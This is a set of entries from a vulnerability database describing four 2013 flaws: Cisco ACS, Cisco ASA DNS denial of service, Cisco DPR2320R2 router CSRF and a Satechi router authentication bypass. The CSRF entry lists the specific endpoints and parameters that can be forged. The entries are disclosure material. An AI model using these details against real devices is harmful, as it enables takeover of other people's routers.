Related entries in the VARIoT exploits database: VAR-E-201312-0241
CVSS V2: 4.0
CVSS V3: -
Severity: MEDIUM
The RBAC implementation in Cisco Secure Access Control System (ACS) does not properly verify privileges for support-bundle downloads, which allows remote authenticated users to obtain sensitive information via a download action, as demonstrated by obtaining read access to the user database, aka Bug ID CSCuj39274. Cisco Secure ACS is a central management platform for Cisco network devices that controls device authentication and authorization. Successful exploits will allow attackers to obtain sensitive information. This may result in further attacks. This issue is tracked by Cisco Bug ID CSCuj39274. The system can control network access and network device access through the RADIUS and TACACS protocols respectively.
VAR-201312-0237 CVE-2013-6696 Cisco Adaptive Security Appliance Software denial of service (DoS) vulnerability CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
Cisco Adaptive Security Appliance (ASA) Software does not properly handle errors during the processing of DNS responses, which allows remote attackers to cause a denial of service (device reload) via a malformed response, aka Bug ID CSCuj28861. The vendor has confirmed this vulnerability and tracks it as Bug ID CSCuj28861. A third party may cause a denial of service (device reload) via a malformed response. Cisco ASA Software is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected device to reload, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCuj28861.
VAR-201312-0304 CVE-2013-7043 Cisco Scientific Atlanta DPR2320 Cross-site request forgery vulnerability in router software CVSS V2: 8.3
CVSS V3: -
Severity: HIGH
Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity; (2) reboot the device via the Restart parameter to goform/restart; (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity; or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic. The Cisco DPR2320R2 Wireless Router is a wireless router product from Cisco of the United States. A cross-site request forgery vulnerability exists in the Cisco DPR2320R2 wireless router using firmware version 2.0.2r1262-090417. A remote attacker could use this vulnerability to perform administrator actions and control the affected device. The Cisco Scientific Atlanta DPR2320R2 is a cable modem gateway device from Cisco. The device includes a cable modem, router and wireless access point, enabling multiple PCs, notebooks or other network devices to share broadband access.
VAR-201311-0241 CVE-2013-6918 Satechi Smart Travel Router Web Management Console Remote Authentication Bypass Vulnerability CVSS V2: 5.8
CVSS V3: -
Severity: MEDIUM
The web interface on the Satechi travel router 1.5, when Wi-Fi is used for WAN access, exposes the console without authentication on the WAN IP address regardless of the "Web Management via WAN" setting, which allows remote attackers to bypass intended access restrictions via HTTP requests. The Satechi Smart Travel Router is a wireless router device. A remote attacker can bypass the device's access restrictions by submitting HTTP requests. The Satechi Travel Router is a portable router product of the American company Satechi that includes standard international plug adapters, USB chargers and a WiFi (802.11b/g/n) router.